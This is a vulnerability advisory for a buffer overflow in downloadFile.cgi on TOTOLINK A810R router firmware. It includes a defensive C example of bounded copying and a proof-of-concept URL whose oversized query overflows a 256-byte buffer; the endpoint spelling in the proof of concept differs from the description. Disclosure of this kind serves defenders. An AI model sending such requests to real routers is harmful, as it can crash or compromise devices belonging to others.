[CVE-ID]
CVE-2025-28022
[PRODUCT]
TOTOLINK
[Vendor of Product]
[VERSION]
V4.1.2cu.5182_B20201026
[Firmware]
https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/166/ids/36.html
[Vulnerability Type]
Buffer Overflow
[Description]
TOTOLINK A810R V4.1.2cu.5182_B20201026 was found to contain a buffer overflow vulnerability in downloadFile.cgi.
The data in v25 comes from v14, which is user-controlled input. In the code, the user-controllable v4 is copied into v26 without any filtering or size restriction, which results in a buffer overflow. For example, consider the payload format: payload=aaa....aaa/bbb...bbb/ccc...ccc. If the "aaa...aaa" section exceeds 256 bytes, it triggers the buffer overflow condition.
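The missing check, as an added example that is not code from the firmware or the vendor: a bounded copy of one '/'-separated segment that rejects oversized input instead of writing past the destination. The names copy_segment, first_segment_result, third_segment_ok and SEG_MAX are hypothetical, and the 256-byte destination size is an assumption taken from the figure in the description.

```c
#include <stddef.h>
#include <string.h>

/* Assumption: 256 is the destination size implied by the description. */
#define SEG_MAX 256

/* Hypothetical helper, not firmware code: copy the index-th '/'-separated
 * segment of query into dst. Returns the segment length, or -1 when the
 * segment is missing or does not fit (including its terminating NUL). */
int copy_segment(const char *query, int index, char *dst, size_t dst_size)
{
    if (query == NULL || dst == NULL || dst_size == 0 || index < 0)
        return -1;
    dst[0] = '\0';

    const char *start = query;
    for (int i = 0; i < index; i++) {       /* skip earlier segments */
        start = strchr(start, '/');
        if (start == NULL)
            return -1;
        start++;
    }

    size_t len = strcspn(start, "/");       /* length up to next '/' or end */
    if (len >= dst_size)                    /* reject instead of truncating */
        return -1;
    memcpy(dst, start, len);
    dst[len] = '\0';
    return (int)len;
}

/* Constructed input: n filler bytes, then "/bbbbbb/cccccc". */
int first_segment_result(size_t n)
{
    char query[1024];
    char seg[SEG_MAX];
    if (n > sizeof query - 16)
        return -1;
    memset(query, 'A', n);
    strcpy(query + n, "/bbbbbb/cccccc");
    return copy_segment(query, 0, seg, sizeof seg);
}

/* Returns 1 when the third segment of a constructed query is "cccccc". */
int third_segment_ok(void)
{
    char seg[SEG_MAX];
    return copy_segment("aaaaaa/bbbbbb/cccccc", 2, seg, sizeof seg) == 6
        && strcmp(seg, "cccccc") == 0;
}
```

A caller that gets -1 should fail the request rather than continue with a truncated value.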
[POC]
<http://IP/cgi-bin/downloadFlile.cgi?QUERY=aaaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/bbbbbb/cccccc>